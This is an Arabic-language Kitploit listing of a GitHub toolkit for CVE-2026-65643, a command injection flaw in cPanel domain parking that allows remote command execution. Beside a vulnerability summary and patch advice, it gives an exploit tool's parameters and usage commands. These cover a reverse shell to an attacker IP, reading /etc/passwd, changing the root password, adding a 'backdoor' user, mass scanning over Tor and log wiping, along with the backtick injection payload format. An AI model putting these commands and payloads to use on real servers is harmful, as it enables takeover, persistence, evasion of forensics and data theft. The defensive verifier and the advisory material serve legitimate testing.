Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-65643-PoC-Toolkit — مجموعة أدوات للفريق الأحمر/الأزرق لثغرة CVE-2026-65643، وهي ثغرة تنفيذ أوامر عن بُعد (RCE) في إيقاف النطاقات في cPanel. تتضمن استغلالًا مع قشرة عكسية، وقشرة ويب، واستمرارية، وفحصًا جماعيًا، بالإضافة إلى أداة تحقق غير تدخلية للكشف والتدقيق. | Kitploit
أدوات/GitHubGitHub/tc4dy/cve-2026-65643-poc-toolkit
تصعيد الامتيازاتماسحات الثغرات الأمنيةآليات الاستمراريةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمر

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
تطوير الحمولات
GitHubtc4dy/cve-2026-65643-poc-toolkit

CVE-2026-65643-PoC-Toolkit

مجموعة أدوات للفريق الأحمر/الأزرق لثغرة CVE-2026-65643، وهي ثغرة تنفيذ أوامر عن بُعد (RCE) في إيقاف النطاقات في cPanel. تتضمن استغلالًا مع قشرة عكسية، وقشرة ويب، واستمرارية، وفحصًا جماعيًا، بالإضافة إلى أداة تحقق غير تدخلية للكشف والتدقيق.

عرض المستودع
منذ يوم واحدلم تتم المراجعة بعد

CVEPoC

CVE‑2026‑65643 – عدة استغلال ثغرة RCE في إيقاف النطاقات في cPanel

Python 3.8+ CVSS Author cPanel

⚠️ للاستخدام الأخلاقي فقط – اختبار أمني مصرح به يوفر هذا المستودع أدوات لـمحترفي الأمن المصرح لهم، وفرق الدفاع الأزرق، ومختبري الاختراق فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني بموجب قانون الاحتيال وإساءة استخدام الكمبيوتر (الولايات المتحدة)، وقانون إساءة استخدام الكمبيوتر (المملكة المتحدة)، والمواد 243/244 من قانون العقوبات التركي، وقوانين مماثلة في جميع أنحاء العالم.


📖 نظرة عامة على الثغرة

CVE‑2026‑65643 هي ثغرة حرجة في حقن الأوامر في إصدارات cPanel & WHM 11.x تسمح لمستخدم cPanel مصادق عليه بتنفيذ أوامر نظام تعسفية بصلاحيات الجذر (root) عبر وظيفة إيقاف النطاقات (domain parking).

كيف تعمل

  1. يتطلب وصولاً مصادقاً عليه – يجب أن يمتلك المهاجم حساب cPanel صالحاً (اسم مستخدم/كلمة مرور) على الخادم المستهدف.
  2. حقن في إيقاف النطاقات – عند إضافة نطاق موقوف، لا يتم تنظيف اسم النطاق بشكل صحيح، مما يسمح للمهاجم بحقن أوامر shell باستخدام علامات backticks (`).
  3. تنفيذ الأوامر – يتم تنفيذ الأمر المحقون بواسطة النظام بصلاحيات مستخدم cPanel، والتي يمكن تصعيدها إلى صلاحيات الجذر عبر تقنيات تصعيد الامتيازات.
  4. صلاحيات الجذر – نظراً لأن عملية إيقاف النطاقات تعمل بصلاحيات كافية، يمكن تنفيذ أوامر تعسفية بصلاحيات عالية.
  5. التأثير – اختراق كامل للخادم، سرقة البيانات، أبواب خلفية، برامج فدية، وحركة جانبية. قم بالترقية فوراً!

الإصدارات المتأثرة

  • cPanel & WHM 11.110.0.140 والإصدارات الأقدم – قابلة للاختراق
  • 11.134.0.52 والإصدارات الأقدم – قابلة للاختراق
  • 11.136.0.36 والإصدارات الأقدم – قابلة للاختراق
  • 11.138.0.1 والإصدارات الأقدم – قابلة للاختراق
  • 11.138.1.6 والإصدارات الأحدث – تم إصلاحها

التصحيح

  • قم بالترقية إلى cPanel & WHM 11.138.1.6 أو 11.138.0.2 أو 11.136.0.37 أو 11.134.0.53 أو 11.110.0.141 أو أحدث.
  • إذا لم تكن الترقية ممكنة، قم بتعطيل صلاحيات إيقاف النطاقات لمستخدمي cPanel كحل مؤقت.

🧰 الأدوات

الأداةالغرضالمستخدم المقصود
exploit.pyعدة استغلال كاملة مع shell عكسي، webshell، استمرارية، قراءة/كتابة ملفات، تغيير كلمة مرور الجذر، فحص جماعي، دعم Tor، وميزات OPSEC.فرق الاختراق / مختبري الاختراق المصرح لهم

📊 مقارنة الميزات


🎯 ملخص حالات الاستخدام


⚙️ التثبيت

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-65643-Toolkit
cd CVE-2026-65643-Toolkit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3

📋 المعاملات

معاملات exploit.py

معاملات verifier.py


💥 السيناريوهات


🧪 نقاط النهاية وطرق الحقن

يستخدم الاستغلال نقاط نهاية وطرق حقن cPanel التالية:

تنسيق الحمولة

root@kitploit:~
# تنسيق حمولة الحقن
test.com`<command>`

# مثال
test.com`id`
test.com`whoami`
test.com`echo 'pwned' > /tmp/pwned`

🛡️ الاستخدام المسؤول

  • استخدم هذه الأدوات فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.
  • الوصول غير المصرح به غير قانوني وغير أخلاقي.
  • المؤلفون غير مسؤولين عن أي إساءة استخدام.
  • اتبع دائماً قوانين وأنظمة بلدك.

يتم توفير هذا البرنامج لأغراض تعليمية واختبار أمني مصرح به فقط.

تنزيل الأداة
verifier.py
فاحص ثغرات غير تدخلي يكتشف إصدار cPanel، ويتحقق من الحقن، ويقيّم المخاطر دون تنفيذ أي حمولة ضارة. يولّد تقارير مفصلة.
فرق الدفاع الأزرق / مدققو الأمن
الميزةexploit.pyverifier.py
اكتشاف الثغرة✅✅
اكتشاف الإصدار (4 نقاط نهاية)✅✅
حقن الأوامر✅❌
Shell عكسي✅❌
رفع WebShell✅❌
استمرارية (إنشاء مستخدم cPanel)✅❌
تغيير كلمة مرور الجذر✅❌
قراءة/كتابة ملفات✅❌
4 طرق حقن (JSON/Form/CGI/API2)✅✅
دعم Tor (إخفاء الهوية)✅❌
تدوير User‑Agent (OPSEC)✅❌
Jitter (OPSEC)✅❌
فحص جماعي (متعدد الخيوط)✅❌
Shell تفاعلي✅❌
وضع غير تدخلي (آمن)❌✅
تسجيل زمني✅✅
تقرير HTML✅❌
تقرير JSON✅✅
تنظيف السجلات (مضاد للطب الشرعي)✅✅
دعم الوكيل✅✅
User‑Agent مخصص✅✅
التحكم في التحقق من SSL✅✅
السيناريوالأداة الموصى بها
فريق الدفاع الأزرق – التحقق مما إذا كان تثبيت cPanel لديك قابلاً للاختراقverifier.py
تدقيق أمني – تقييم ثغرات غير تدخليverifier.py
فريق الاختراق – اختبار اختراق مصرح به مع استغلال كاملexploit.py
مكافآت الثغرات – اختبار كشف مسؤولverifier.py
فحص جماعي – فحص أهداف متعددة بحثاً عن الثغرةexploit.py (اكتشاف فقط)
الاستجابة للحوادث – التحقق مما إذا كانت الأنظمة مخترقةverifier.py
المعاملالوصف
-t, --targetعنوان URL المستهدف لـ cPanel (مثال: https://cpanel.example.com:2083)
-l, --target-fileملف يحتوي على قائمة الأهداف (سطر واحد لكل هدف) للفحص الجماعي
-u, --usernameاسم مستخدم cPanel
-P, --passwordكلمة مرور cPanel
-p, --portتجاوز منفذ cPanel (الافتراضي من عنوان URL أو 2083)
--threadsعدد الخيوط للأهداف المتعددة (الافتراضي: 10)
-o, --outputحفظ تقرير JSON في ملف
--html-reportحفظ تقرير HTML في ملف
-v, --verboseإخراج تفصيلي
--proxyوكيل HTTP/HTTPS (مثال: http://127.0.0.1:8080)
--torالتوجيه عبر Tor (localhost:9050)
-ua, --user-agentUser‑Agent مخصص
--no-keep-aliveعدم إبقاء الجلسة نشطة
--delayالتأخير بين الطلبات (الافتراضي: 2.0 ثانية)
--jitterJitter عشوائي (0‑1 ثانية) بين الطلبات (الافتراضي: 0.5)
--max-retriesالحد الأقصى لإعادة المحاولة (الافتراضي: 5)
--ssl-verifyالتحقق من شهادات SSL
--timeoutمهلة الطلب (الافتراضي: 15 ثانية)
--cmdتنفيذ أمر واحد على الهدف
--reverse-shellIP:PORT للـ shell العكسي
--passwdتغيير كلمة مرور الجذر
--adduserإنشاء مستخدم cPanel (USER DOMAIN PASSWORD)
--readقراءة ملف
--writeكتابة ملف (تحديد المسار)
--write-contentالمحتوى المراد كتابته
--cleanupتنظيف السجلات والسجل بعد الاستغلال
-i, --interactiveShell تفاعلي بعد الاستغلال
--domain-suffixلاحقة النطاق الموقوف (الافتراضي: exploit.local)
المعاملالوصف
-t, --targetعنوان URL المستهدف لـ cPanel (مثال: https://cpanel.example.com:2083)
-u, --usernameاسم مستخدم cPanel
-P, --passwordكلمة مرور cPanel
-o, --outputحفظ تقرير JSON في ملف
-v, --verboseإخراج تفصيلي
--proxyوكيل HTTP/HTTPS (مثال: http://127.0.0.1:8080)
--torالتوجيه عبر Tor (localhost:9050)
--ssl-verifyالتحقق من شهادات SSL
--timeoutمهلة الطلب (الافتراضي: 15 ثانية)
--cleanupتنظيف السجلات بعد الاختبار
#السيناريوالأمر
1فحص سريع للثغرةpython verifier.py -t https://cpanel.example.com:2083 -u user -P pass
2فحص تفصيلي مع تقريرpython verifier.py -t https://cpanel.example.com:2083 -u user -P pass -o report.json -v
3Shell عكسيpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4تنفيذ أمرpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cmd "whoami"
5قراءة ملف حساسpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6تغيير كلمة مرور الجذرpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7إنشاء مستخدم cPanel جديد (استمرارية)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8Shell تفاعلي بعد الاستغلالpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9فحص جماعي من ملفpython exploit.py -l targets.txt -u user -P pass --threads 20 -o results.json
10استخدام وكيل وTor وUser‑Agent مخصصpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 --tor -ua "Mozilla/5.0"
11تنظيف السجلات بعد الاستغلالpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cleanup
الطريقةنقطة النهايةالوصف
JSON API/cpsessXXXXX/json-api/domainطريقة الحقن الأساسية عبر حمولة JSON
Form Data/cpsessXXXXX/json-api/domainحقن بديل عبر بيانات مشفرة بنموذج
CGI Script/cgi-sys/domainpark.cgiحقن عبر نقطة نهاية CGI القديمة
API2/cpsessXXXXX/json-api/cpanelطريقة حقن API2 القديمة